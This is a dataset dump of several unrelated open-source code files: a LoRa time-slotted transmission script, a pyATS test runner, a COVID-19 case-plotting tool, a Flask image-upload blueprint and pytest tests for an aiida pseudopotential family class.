special_characters=True,\n feature_names=feature_names,\n class_names=class_names)\n\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\ngraph.write_png(\"not_asbig_tree.png\")\nImage(graph.create_png())\n\"\"\"\n\n#perform_bayes(df)\n","repo_name":"atemmel/datamining","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72905982593","text":"# implementation of Light algorithm (node side)\n# \"Offline scheduling algorithms for time-slotted lora-based bulk data transmission\"\n# author: Dimitris Zorbas (dimzorbas@ieee.org)\n#\n# Distributed under GNU GPLv3\n\nimport os\nimport socket\nimport time\nimport struct\nfrom network import LoRa\nimport pycom\nimport machine\nimport ubinascii\nfrom network import WLAN\nfrom network import Bluetooth\nfrom network import Server\nfrom pytrack import Pytrack\nimport uos\nfrom machine import Timer\nimport math\n\nwlan = WLAN()\nwlan.deinit()\nbt = Bluetooth()\nbt.deinit()\nserver = Server()\nserver.deinit()\npy = Pytrack()\nANSELC_ADDR = const(0x18E)\npy.poke_memory(ANSELC_ADDR, ~(1 << 7))\n\n_LORA_PKG_FORMAT = \"!BB%ds\"\n_LORA_RCV_PKG_FORMAT = \"!BB%ds\"\nMY_ID = 0x0B\n(my_sf, my_bw_index, my_slot, guard, sync_rate) = (7, 2, 0, 40, 1) # default values\nfreqs = [865000000, 865600000, 866200000, 866800000, 867400000, 868000000] # my channels\n# airtimes for 100-byte packets and 8 preamble symbols\nairtime = [[0.174336, 0.087168, 0.043584], [0.307712, 0.153856, 0.076928], [0.553984, 0.276992, 0.138496], [1.026048, 0.513024, 0.256512], [2.215936, 0.944128, 0.472064], [3.940352, 1.724416, 0.862208]]\nif (my_bw_index == 0):\n my_bw = LoRa.BW_125KHZ\nelif (my_bw_index == 1):\n my_bw = LoRa.BW_250KHZ\nelse:\n my_bw = LoRa.BW_500KHZ\n\npycom.heartbeat(False)\noff = 0x000000\nred = 0xFF0000\ngreen = 0x00FF00\nblue = 0x0000FF\nwhite = 0xFFFAFA\nlight_green = 0x7CFC00\n\nwhile (True): # run multiple tests\n pycom.rgbled(green)\n lora = LoRa(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[0], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=12)\n lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n lora_sock.setblocking(False)\n rec = 0\n while (rec == 0):\n recv_pkg = lora_sock.recv(4096)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n print(str(recv_pkg))\n if (int(recv_pkg_id) == 1):\n dev_id, leng, data = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n print('Device: %d - Pkg: %s' % (dev_id, data))\n data = str(data)[2:]\n data = data[:-1]\n if \":\" in str(data): # schedule: guard:sync_rate:id1 sf slot,id2 sf slot,...\n pycom.rgbled(red)\n (guard, sync_rate, data) = str(data).split(\":\")\n guard = int(guard)\n sync_rate = int(sync_rate)\n nodes = str(data).split(\",\")\n print(nodes)\n for n in nodes:\n (id, sf, slot) = str(n).split(\" \")\n if (int(id) == int(MY_ID)):\n my_sf = int(sf)\n my_slot = int(slot)\n print(\"guard = \", guard, \"sf = \", my_sf, \"slot = \", my_slot)\n print(\"waiting for sync command\")\n elif (str(data) == \"init\"): # data collection initialisation\n print(\"init received!\")\n pycom.rgbled(blue)\n rec = 1\n lora.init(power_mode=LoRa.SLEEP)\n chrono = Timer.Chrono()\n chrono.start()\n\n msg = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\" # just a 98-byte message\n pycom.rgbled(light_green)\n i = 1\n airt = airtime[my_sf-7][my_bw_index]*1000 # 
conversion to ms\n round = int(math.ceil(100*airt/(airt + 2*guard))*(airt + 2*guard)) # we assume that the frame size (round) is defined by the duty cycle (need to change this for a higher number of nodes)\n print(\"round length = \", round)\n packets = 100 # number of packets to send\n active = 0.0\n print(\"S T A R T\")\n avg_desync = 0.0\n syncs = 1\n while(i <= packets):\n print(i, \"----------------------------------------------------\")\n start = chrono.read_ms()\n print(\"started new round at:\", start)\n t = int(my_slot*(airt + 2*guard) + guard) + int(avg_desync/syncs) # sleep time before transmission\n machine.idle()\n time.sleep_ms(t)\n pycom.rgbled(red)\n on_time = chrono.read_ms()\n lora.init(mode=LoRa.LORA, tx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.TX_ONLY, bandwidth=my_bw, sf=my_sf, tx_power=7)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(msg), MY_ID, len(msg), msg)\n lora_sock.send(pkg)\n pycom.rgbled(blue)\n print(\"Message of \"+str(len(pkg))+\" bytes sent at:\", chrono.read_ms())\n lora.power_mode(LoRa.SLEEP)\n # print(lora.stats())\n cur_time = chrono.read_ms()\n active += (cur_time - on_time)\n t = round - int(cur_time - start)\n machine.idle()\n time.sleep_ms(t)\n if (i % sync_rate == 0): # synchronisatio\n syncs += 1\n sync_slot = 100 # I have to fix this\n rec = 0\n lora.init(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf)\n sync_start = chrono.read_ms()\n print(\"started sync slot at:\", sync_start)\n while (rec == 0):# and ((chrono.read_ms() - sync_start) <= sync_slot):\n machine.idle()\n pycom.rgbled(white)\n desync = 0\n recv_pkg = lora_sock.recv(100)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n if (int(recv_pkg_id) == (my_sf-7+1)):\n dev_id, leng, s_msg = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n s_msg = str(s_msg)[2:]\n s_msg = s_msg[:-1]\n try: # 1st sync method\n s_msg = int(s_msg)\n s_msg += 10 # propagation time\n desync = s_msg - int(chrono.read_ms())\n print(\"desync: \"+str(desync)+\"ms\")\n avg_desync += desync\n if (avg_desync < 0):\n chrono.stop()\n time.sleep_ms(abs(int(avg_desync)))\n chrono.start()\n avg_desync = 0\n lora.power_mode(LoRa.SLEEP)\n active += (chrono.read_ms() - sync_start)\n time.sleep_ms(guard)\n rec = 1\n except ValueError: # alternative sync method\n if (str(s_msg) == \"sync\"):\n print(\"sync received!\")\n lora.power_mode(LoRa.SLEEP)\n active += (chrono.read_ms() - sync_start)\n time.sleep_ms(guard-1)\n rec = 1\n print(\"sync slot lasted:\", abs(time.ticks_diff(int(chrono.read_ms()), int(sync_start))), \"ms\")\n pycom.rgbled(blue)\n finish = chrono.read_ms()\n print(\"round lasted:\", abs(time.ticks_diff(int(finish), int(start))), \"ms\")\n print(\"Current active time\", active, \"ms\")\n i += 1\n\n print(\"Total active time\", active, \"ms\")\n pycom.rgbled(off)\n lora_sock.close()\n time.sleep(20)\n","repo_name":"deltazita/offline-lora","sub_path":"pycom_implementations/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24603500166","text":"import os\nfrom ats.easypy import run\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', dest='device')\n parser.add_argument('--nbr-count', dest='expected_nbr_count')\n args, unknown = parser.parse_known_args()\n pwd = 
os.path.dirname(__file__)\n eigrp = os.path.join(pwd, 'EIGRP_TestCases.py')\n run(testscript=eigrp, **vars(args))\n","repo_name":"DevNetSandbox/sbx_multi_ios","sub_path":"dmvpn-as-code/tests/eigrp_neighbor_check.py","file_name":"eigrp_neighbor_check.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"61"} +{"seq_id":"21030182246","text":"import pandas as pd\nimport requests\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as mt\n\ndef wget(url): #esta funcion importa archivos para Windows, es para la base de datos\n r = requests.get(url, allow_redirects=True)\n with open(url[url.rfind('/') + 1::], 'wb') as f:\n f.write(r.content)\nwget('https://covid.ourworldindata.org/data/ecdc/full_data.csv')\ndef es_numero(num,cant): #Esta funcion revisa que el input sea correcto o en caso contrario informa la necesidad de caracteres numericos\n if len(num)==cant: #requiere que un input tenga una determinada cantidad de caracteres\n if num.isdigit() is True: #chequea que el input sea numerico\n return True\n else: #En caso de que el input no sea numerico, informa de ese requerimiento\n print('Ingrese exclusivamente caracteres numericos por favor.')\n return False \n else: #En caso de que el input no tenga la cantidad necesaria, informa cual es.\n str_cant=str(cant) \n print('Ingrese '+str_cant+' caracteres por favor.')\n return False\n \ndef es_fecha_correcta(num,inicio,final): #Esta función revisa que las fechas esten en los valores correctos\n num=int(num)\n if num>=inicio and num<=final: #chequea que un int este dentro de los limites requeridos\n return True\n else: #si el input no esta dentro de los limites, informa cuales son.\n str_inicio=str(inicio)\n str_final=str(final)\n print('Ingrese un numero entre '+str_inicio+' y '+str_final+' por favor')\n return False\n\ndef año(num): #Chequea que el año ingresado sea válido.\n if es_numero(num,4) is True:\n if es_fecha_correcta(num,2019,2020) is True:\n return True\n else:\n return False\n else:\n return False\n\ndef mes(num): #Chequea que el mes ingresado sea válido.\n if es_numero(num,2) is True:\n if es_fecha_correcta(num,1,12) is True:\n return True\n else:\n return False\n else:\n return False\n\ncant_dias={31:['01','03','05','07','08','10','12'],30:['04','06','09','11']} #lista de meses con sus cantidades de dias respectivas.\ndef cant_dias_en_mes(mes): #Comprueba que el numero del dia coincida con la cantidad de dias del mes\n if mes in cant_dias[31]:\n return 31\n elif mes in cant_dias[30]:\n return 30\n elif mes == '02':\n if año_inicio =='2020':\n return 29\n if año_inicio =='2019':\n return 28\n\ndef dia(num,limite): #Chequea que el dia ingresado sea válido.\n if es_numero(num,2) is True:\n if es_fecha_correcta(num,1,limite) is True:\n return True\n else:\n return False\n else:\n return False\n\ndef graficar_casos(fecha,lista_paises,matriz,log): #Esta funcion genera los graficos. 
Recibe una lista de fechas, una de los paises a graficar, y una matriz con los valores de cada país\n for z in range (0,num_paises):\n plt.subplot(1, 2, 1) # grafico de nuevos casos\n plt.plot(fecha,matriz[:,0,z],':', label=lista_paises[z])\n print(fecha)\n print(matriz[:,0,z])\n plt.xlabel('fecha')\n plt.xticks(rotation=90)\n plt.ylabel('casos')\n log \n plt.title('Casos totales de COVID-19 según la fecha')\n plt.legend()\ndef graficar_muertes(fecha,lista_paises,matriz):\n for z in range (0,num_paises):\n plt.subplot(1, 2, 2) #grafico de nuevas muertes\n plt.plot(fecha,matriz[:,1,z],':', label=lista_paises[z])\n plt.ylabel('muertes')\n plt.xlabel('fecha')\n plt.xticks(rotation=90)\n plt.title('Muertes totales por COVID-19 según la fecha')\n plt.legend()\n\ndef find_intersecciones_y_graficar(fecha,matriz,dato_a_graficar): # Esta funcion encuentra las intersecciones entre las lineas a graficar y las señala con un punto azul\n largo=len(fecha)\n for pais in range (0,num_paises): #este for recorre cada país a graficar\n if pais<num_paises:\n for pais_a_comparar in range(pais+1,num_paises): #este for selecciona paises a comparar con el elegido arriba\n interseccion_indice=[]\n for valores in range (0,largo): #este for recorre las listas de valores sean de casos o de muertes\n if matriz[valores,dato_a_graficar,pais]==matriz[valores,dato_a_graficar,pais_a_comparar]:#este if detecta si hay valores en comun y guarda el indice en una lista\n interseccion_indice.append(valores)\n y_interseccion=[]\n x_interseccion=[]\n for x in interseccion_indice: #este for trae el valor de X y el valor de Y de las intersecciones\n y_interseccion.append(matriz[x,dato_a_graficar,pais])\n x_interseccion.append(fecha[x])\n if dato_a_graficar==0:\n plt.subplot(1, 2, 1) # casos\n plt.scatter(x_interseccion,y_interseccion,s = 10,c='blue' , linewidth = 5)\n elif dato_a_graficar==1:\n plt.subplot(1, 2, 2) # casos\n plt.scatter(x_interseccion,y_interseccion,s = 10,c='blue' , linewidth = 5)\n\n#este bloque obtiene la lista de paises del csv y toma una sola iteración de cada una para que \n# el input de pais elegido chequee contra esto.\ndata=pd.read_csv('full_data.csv')\ncolumna_pais=pd.DataFrame(data, columns= ['location'])\nlista_paises_repetidos=columna_pais.values.tolist() #genera una lista de la columna de paises de la base de datos\nlista_paises_correcta=np.unique(lista_paises_repetidos) #guarda una sola iteración de cada país de la base de datos\n\n#este bloque obtiene la lista de paises del csv y toma una sola iteración de cada una para que \n# el input de pais elegido chequee contra esto.\n\n\n\nprint('Bienvenido al graficador de COVID-19') \nconfirmacion_pais=0 #variable de confirmación del input\nwhile confirmacion_pais==0: #chequea que el usuario confirme su ingreso\n num_paises=(input('Ingrese numero de paises a comparar(Ej:02): '))\n while es_numero(num_paises,2) is False: #chequea que el ingreso sea la cantidad correcta de caracteres numericos\n num_paises=(input('Ingrese numero de paises a comparar(Ej:02): '))\n num_paises=int(num_paises)\n lista_paises_a_graficar=[] #lista en la que se almacenaran los paises a graficar\n for x in range (0,num_paises): # for que carga la lista de paises\n pais=input('Ingrese país(utilizando el nombre en inglés y con mayúscula(ej:Spain)): ') \n if pais in lista_paises_correcta: #Chequea que el input de pais sea válido en la base de datos\n lista_paises_a_graficar.append(pais)\n else:\n while pais not in lista_paises_correcta: #En caso de input invalido, requiere volver a 
ingresar\n print('Error al ingresar el nombre del país. Por favor, vuelva a intentar.(recuerde utilizar el nombre en inglés y con mayúscula(ej:Spain))')\n pais=input('Ingrese país(utilizando el nombre en inglés y con mayúscula(ej:Spain)): ')\n else:\n lista_paises_a_graficar.append(pais)\n print('usted ha seleccionado',end=' ') #muestra la lista ingresada y pide confirmacion\n print(lista_paises_a_graficar,end=' ') #muestra la lista ingresada y pide confirmacion\n conf=input('¿es correcto?(si/no)') #muestra la lista ingresada y pide confirmacion\n while not(conf=='si' or conf=='no'): #chequea que el input de confirmación sea estrictamente si o no\n conf=input('Ingrese si o no: ')\n if conf=='si':\n confirmacion_pais=1\n elif conf=='no':\n confirmacion_pais=0\n\n\nerror_fecha=1\nwhile error_fecha==1:\n confirmacion_fechas=0\n while confirmacion_fechas==0:\n print('Ingresar la fecha de inicio del periodo a consultar') #el csv usa el formato año-mes-dia\n año_inicio=(input('Ingrese año de inicio(Ej:2020): '))\n while año(año_inicio)is False:\n año_inicio=(input('Ingrese año de inicio(Ej:2020): '))\n mes_inicio=(input('Ingrese mes de inicio(Ej:06): '))\n while mes(mes_inicio)is False:\n mes_inicio=(input('Ingrese mes de inicio(Ej:06): '))\n dia_inicio_limite=cant_dias_en_mes(mes_inicio)\n dia_inicio=(input('Ingrese dia de inicio(Ej:08): '))\n while dia(dia_inicio,dia_inicio_limite)is False:\n dia_inicio=(input('Ingrese dia de inicio(Ej:08): '))\n\n fecha_inicio=año_inicio+'-'+mes_inicio+'-'+dia_inicio\n\n año_cierre=(input('Ingrese año de cierre(Ej:2020): '))\n while año(año_cierre)is False:\n año_cierre=(input('Ingrese año de cierre(Ej:2020): '))\n mes_cierre=(input('Ingrese mes de cierre(Ej:06): '))\n while mes(mes_cierre)is False:\n mes_cierre=(input('Ingrese mes de cierre(Ej:06): '))\n dia_cierre_limite=cant_dias_en_mes(mes_inicio)\n dia_cierre=(input('Ingrese dia de cierre(Ej:08): '))\n while dia(dia_cierre,dia_cierre_limite)is False:\n dia_cierre=(input('Ingrese dia de cierre(Ej:08): '))\n\n fecha_cierre=año_cierre+'-'+mes_cierre+'-'+dia_cierre\n print('usted ha seleccionado',end=' ') \n print(fecha_inicio,end=' y ')\n print(fecha_cierre,end=' ')\n conf=input('¿es correcto?(si/no)')\n while not(conf=='si' or conf=='no'):\n conf=input('Ingrese si o no: ')\n if conf=='si':\n confirmacion_fechas=1\n elif conf=='no':\n confirmacion_fechas=0\n if np.datetime64(fecha_cierre)<np.datetime64(fecha_inicio):\n error_fecha=1\n print('La fecha de cierre es anterior a la fecha de inicio. 
Please enter the data in the correct order.')\n    else:\n        error_fecha=0\n#lista_paises_a_graficar\n#fecha_inicio\n#fecha_cierre\n\n# create the array of date values for the x axis\nfechaFinal = (np.datetime64(fecha_cierre)+np.timedelta64(1, 'D'))\nfechas=np.array(np.arange(fecha_inicio, fechaFinal, dtype='datetime64[D]'))\n\n# set the dimension sizes for the array of Y values (new cases, deaths)\ndias = (np.datetime64(fechaFinal) - np.datetime64(fecha_inicio) )\ncolumnas = 2\nmatrices = len(lista_paises_a_graficar)\nmatrizDatos = np.zeros([np.size(fechas), columnas, matrices], dtype=np.int64)\n\n# Matrix sanity checks\n\n#print(matrizDatos)\n#print(np.size(fechas)*columnas*matrices)\n#print(np.size(matrizDatos))\n#print(np.shape(matrizDatos))\n\n\n# Sanity check of the dates array\n''' \nprint(fechas)\nprint(np.size(fechas))\n'''\n\n# look up a particular date\n'''\ninicio = np.where(fechas == np.datetime64('2020-05-02'))[0]\nprint(inicio)\n'''\n\n# collect the data for the required country\ndatosPais = pd.DataFrame(data, columns= ['date','location','new_cases','new_deaths'])\nfor pais in lista_paises_a_graficar:\n    arrayDatosPais = np.array(datosPais[datosPais.location == pais], )\n\n    #print(arrayDatosPais)\n    if ((np.datetime64(arrayDatosPais[0,0])) < (np.datetime64(fecha_inicio))):\n        inicioDatoPais = int(np.where(arrayDatosPais == fecha_inicio)[0])\n        inicioMatrizDatos = int(0)\n    \n    else:\n        \n        #inicioMatrizDatos = int(np.where(fechas == np.datetime64(arrayDatosPais[0][0]))[0])\n        inicioMatrizDatos = int(np.where(arrayDatosPais == fecha_inicio)[0])\n        inicioDatoPais = int(0)\n\n    #print(inicioDatoPais)\n    #print(inicioMatrizDatos)\n    \n    if (np.datetime64(arrayDatosPais[int((np.shape(arrayDatosPais)[0]))-1][0]) < (np.datetime64(fecha_cierre))):\n        finalDeCarrera = np.size(fechas)\n    \n    else:\n        \n        finalDeCarrera = int(np.shape(arrayDatosPais)[0])\n        finalDeCarrera = int(np.where(arrayDatosPais == fecha_cierre)[0])\n\n    # print(finalDeCarrera)\n    # print(np.size(fechas))\n\n    \n    print('inicioDatoPais: ',inicioDatoPais)\n    print('inicioMatrizDatos: ',inicioMatrizDatos)\n    print('inicioMatrizDatos+x: ',inicioMatrizDatos)\n    print('finalDeCarrera: ',finalDeCarrera)\n\n    for x in range(inicioDatoPais, finalDeCarrera, 1):\n        \n        '''\n        print('x: ',x)\n        print('inicioDatoPais: ',inicioDatoPais)\n        print('inicioMatrizDatos: ',inicioMatrizDatos)\n        print('inicioMatrizDatos+x: ',inicioMatrizDatos+x)\n        print('finalDeCarrera: ',finalDeCarrera)\n        '''\n        \n        if (int((np.shape(arrayDatosPais)[0]))>(int(np.shape(fechas)[0]))):\n\n            if mt.isnan(arrayDatosPais [(x), 2]):\n                print('nin_cases 1')\n                matrizDatos[x-inicioDatoPais, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n            else:\n                print('cases 1')\n                matrizDatos[x-inicioDatoPais, 0, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x, 2])\n\n            if mt.isnan(arrayDatosPais [(x), 3]):\n                print('nin_death 1')\n                matrizDatos [x-inicioDatoPais, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n            else:\n                print('death 1')\n                matrizDatos[x-inicioDatoPais, 1, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x, 3])\n        else:\n            if ((x<inicioMatrizDatos) or (x>(int((np.shape(arrayDatosPais)[0]))))):\n                \n                matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n                matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n                \n            else:\n                if mt.isnan(arrayDatosPais [(x-1), 2]):\n                    print('nin_cases 2')\n                    matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(0)\n                else:\n                    print('cases 2')\n                    matrizDatos[x, 0, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x-1, 2])\n\n                if mt.isnan(arrayDatosPais [(x-1), 3]):\n                    print('nin_death 2')\n                    matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(0)\n                else:\n                    print('death 2')\n                    matrizDatos[x, 1, int(lista_paises_a_graficar.index(pais))] = int(arrayDatosPais[x-1, 3])\n\n\n#plt.plot(fechas,matrizDatos[:,0,0])\n#plt.show()\n\nlen_paises=len(lista_paises_a_graficar)\nif len_paises==1:\n    graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'')\n    graficar_muertes(fechas,lista_paises_a_graficar,matrizDatos)\nelif len_paises==2:\n    graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'')\n    graficar_muertes(fechas,lista_paises_a_graficar,matrizDatos)\n    find_intersecciones_y_graficar(fechas,matrizDatos,0)\n    find_intersecciones_y_graficar(fechas,matrizDatos,1)\nelif len_paises>2:\n    graficar_casos(fechas,lista_paises_a_graficar,matrizDatos,'plt.yscale(log)')\n    find_intersecciones_y_graficar(fechas,matrizDatos,0)\n\nplt.get_current_fig_manager().window.state('zoomed')\nplt.show()\n","repo_name":"KhamilN/Graficador-COVID-19","sub_path":"Graficador COVID-19.py","file_name":"Graficador COVID-19.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9431620474","text":"from flask import (\n\tBlueprint,\n\trequest,\n\tsession,\n\tjsonify,\n\tcurrent_app,\n\turl_for,\n\tsend_from_directory\n)\n\nimport uuid\n\nimport os\n\nfrom werkzeug.utils import secure_filename\n\nfrom db import db\n\n# List of file extensions allowed for upload\nALLOWED_EXTENSIONS = set(['.png', '.jpg', '.jpeg', '.gif'])\n\nbp = Blueprint('images', __name__)\n\n@bp.route('', methods=[\"POST\"])\ndef images():\n\t\"\"\" Handle adding an image URL link to the DB \"\"\"\n\t# get the user_id from the current session\n\tuser_id = session.get('user_id')\n\t\n\t# if user_id does not exist, no session has been created,\n\t# so return code 403\n\tif user_id is None:\n\t\treturn '', 403\n\t\n\t# create a DB connection\n\tcon = db.connection\n\t\n\t# check in the DB whether the selected user is a seller\n\tcur = con.execute(\"\"\"\n\t\tSELECT slr.id\n\t\tFROM account AS ac\n\t\t\tJOIN seller AS slr ON slr.account_id = ac.id\n\t\tWHERE ac.id = ?\n\t\t\"\"\",\n\t\t(user_id,)\n\t)\n\tis_seller = cur.fetchone()\n\t\n\t# if the user is a seller\n\tif is_seller is not None:\n\t\t# try to get the file from the request\n\t\ttry:\n\t\t\tfile = request.files['image']\n\t\texcept:\n\t\t\t# no file in the request, return code 400\n\t\t\treturn '', 400\n\t\t\n\t\t# if the file was received, save it to the folder\n\t\tif file:\n\t\t\torig_fn = secure_filename(file.filename)\n\t\t\tfile_ext = os.path.splitext(orig_fn)[1]\n\t\t\tfilename = f'{uuid.uuid4()}{file_ext}'\t\t\t\n\t\t\tupload_path = current_app.config['UPLOAD_FOLDER']\n\t\t\t\n\t\t\t# check that the uploaded file's extension is allowed\n\t\t\tif file_ext in ALLOWED_EXTENSIONS:\n\t\t\t\tfile.save(os.path.join(upload_path, filename))\n\t\t\t\treturn jsonify(\n\t\t\t\t\t{'url' : url_for('images.get_images', filename=filename)}\n\t\t\t\t), 200\n\t\t\n\t\treturn '', 400\n\t\n\t# otherwise the user is not registered as a seller, so return code 403\n\treturn '', 403\n\n@bp.route('/<filename>')\ndef get_images(filename):\n\t\"\"\" Handle fetching an image by name and URL path \"\"\"\n\t# get the path of the folder holding uploaded image files\n\tupload_path = current_app.config['UPLOAD_FOLDER']\n\n\t# check whether the requested file exists at that path\n\tif os.path.exists(os.path.join(upload_path, filename)):\n\t\t# the requested file was found, return it\n\t\treturn send_from_directory(\n\t\t\tupload_path,\n\t\t\tfilename,\n\t\t\tas_attachment=True\n\t\t)\n\t\n\t# the requested file was not found, return code 404\n\treturn '', 404\n","repo_name":"MB6718/Auto-Sales-Site","sub_path":"src/blueprints/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25061787334","text":"# -*- coding: utf-8 -*-\n# pylint: disable=unused-argument,pointless-statement\n\"\"\"Tests for the `SsspFamily` class.\"\"\"\nimport copy\nimport distutils.dir_util\nimport os\nimport shutil\nimport tempfile\n\nimport pytest\n\nfrom aiida import orm\nfrom aiida.common import exceptions\n\nfrom aiida_sssp.data import SsspParameters\nfrom aiida_sssp.groups import SsspFamily\n\n\ndef test_type_string(clear_db):\n    \"\"\"Verify the `_type_string` class attribute is correctly set to the corresponding entry point name.\"\"\"\n    assert SsspFamily._type_string == 'sssp.family' # pylint: disable=protected-access\n\n\ndef test_construct(clear_db):\n    \"\"\"Test the construction of `SsspFamily` works.\"\"\"\n    family = SsspFamily(label='SSSP').store()\n    assert isinstance(family, SsspFamily)\n\n    description = 'SSSP description'\n    family = SsspFamily(label='SSSP/v1.1', description=description).store()\n    assert isinstance(family, SsspFamily)\n    assert family.description == description\n\n\ndef test_load(clear_db):\n    \"\"\"Test that loading of a `SsspFamily` through `load_group` works.\"\"\"\n    family = SsspFamily(label='SSSP').store()\n    assert isinstance(family, SsspFamily)\n\n    loaded = orm.load_group(family.pk)\n    assert isinstance(family, SsspFamily)\n    assert loaded.uuid == family.uuid\n    assert loaded.elements == family.elements\n\n\ndef test_add_nodes(clear_db, get_upf_data):\n    \"\"\"Test the `SsspFamily.add_nodes` method.\"\"\"\n    upf_he = get_upf_data(element='He').store()\n    upf_ne = get_upf_data(element='Ne').store()\n    upf_ar = get_upf_data(element='Ar').store()\n    family = SsspFamily(label='SSSP').store()\n\n    with pytest.raises(TypeError):\n        family.add_nodes(orm.Data().store())\n\n    with pytest.raises(TypeError):\n        family.add_nodes([orm.Data().store(), orm.Data().store()])\n\n    with pytest.raises(TypeError):\n        family.add_nodes([upf_ar, orm.Data().store()])\n\n    assert family.count() == 0\n\n    family.add_nodes(upf_he)\n    assert family.count() == 1\n\n    # Check that adding a duplicate element raises, and that no extra nodes have been added.\n    with pytest.raises(ValueError):\n        family.add_nodes([upf_ar, upf_he, upf_ne])\n    assert family.count() == 1\n\n    family.add_nodes([upf_ar, upf_ne])\n    assert family.count() == 3\n\n\ndef test_elements(clear_db, get_upf_data):\n    \"\"\"Test the `SsspFamily.elements` property.\"\"\"\n    upf_he = get_upf_data(element='He').store()\n    upf_ne = get_upf_data(element='Ne').store()\n    upf_ar = get_upf_data(element='Ar').store()\n    family = SsspFamily(label='SSSP').store()\n\n    family.add_nodes([upf_he, upf_ne, upf_ar])\n    assert family.count() == 3\n    assert sorted(family.elements) == ['Ar', 'He', 'Ne']\n\n\ndef test_get_pseudo(clear_db, get_upf_data):\n    \"\"\"Test the `SsspFamily.get_pseudo` property.\"\"\"\n    upf_he = get_upf_data(element='He').store()\n    upf_ne = get_upf_data(element='Ne').store()\n    upf_ar = get_upf_data(element='Ar').store()\n    family = SsspFamily(label='SSSP').store()\n    family.add_nodes([upf_he, upf_ne, upf_ar])\n\n    with 
pytest.raises(ValueError) as exception:\n family.get_pseudo('X')\n\n assert 'family `{}` does not contain pseudo for element'.format(family.label) in str(exception.value)\n\n element = 'He'\n upf = family.get_pseudo(element)\n assert isinstance(upf, orm.UpfData)\n assert upf.element == element\n\n\ndef test_validate_parameters(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.validate_parameters` class method.\"\"\"\n family = create_sssp_family()\n parameters = create_sssp_parameters()\n metadata = parameters.get_metadata()\n\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n # Incorrect filename\n incorrect = copy.deepcopy(metadata['Ar'])\n incorrect['filename'] = 'wrong_file_name'\n parameters.set_attribute('Ar', incorrect)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n assert 'inconsistent `filename` for element `Ar`' in str(exception.value)\n\n # Incorrect md5\n incorrect = copy.deepcopy(metadata['Ar'])\n incorrect['md5'] = '123abc'\n parameters.set_attribute('Ar', incorrect)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.validate_parameters(list(family.nodes), parameters)\n\n assert 'inconsistent `md5` for element `Ar`' in str(exception.value)\n\n\ndef test_create_from_folder(clear_db, filepath_pseudos):\n \"\"\"Test the `SsspFamily.create_from_folder` class method.\"\"\"\n label = 'SSSP'\n family = SsspFamily.create_from_folder(filepath_pseudos, label)\n\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n assert family.count() == len(os.listdir(filepath_pseudos))\n assert sorted(family.elements) == sorted([filename.rstrip('.upf') for filename in os.listdir(filepath_pseudos)])\n\n # Cannot create another family with the same label\n with pytest.raises(ValueError):\n SsspFamily.create_from_folder(filepath_pseudos, label)\n\n with pytest.raises(TypeError) as exception:\n SsspFamily.create_from_folder(filepath_pseudos, label, description=1)\n assert 'Got object of type' in str(exception.value)\n\n\ndef test_create_from_folder_invalid(clear_db, filepath_pseudos):\n \"\"\"Test the `SsspFamily.create_from_folder` class method for invalid inputs.\"\"\"\n label = 'SSSP'\n\n with tempfile.TemporaryDirectory() as dirpath:\n\n # Non-existing directory should raise\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(os.path.join(dirpath, 'non-existing'), label)\n\n assert 'is not a directory' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n distutils.dir_util.copy_tree(filepath_pseudos, dirpath)\n\n # Copy an existing pseudo to test that duplicate elements are not allowed\n filename = os.listdir(dirpath)[0]\n filepath = os.path.join(dirpath, filename)\n shutil.copy(filepath, os.path.join(dirpath, filename[:-4] + '2.upf'))\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, 